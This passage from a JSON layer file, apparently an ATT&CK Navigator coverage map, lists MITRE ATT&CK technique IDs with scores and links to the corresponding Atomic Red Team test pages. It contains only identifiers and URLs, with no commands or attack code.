Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View 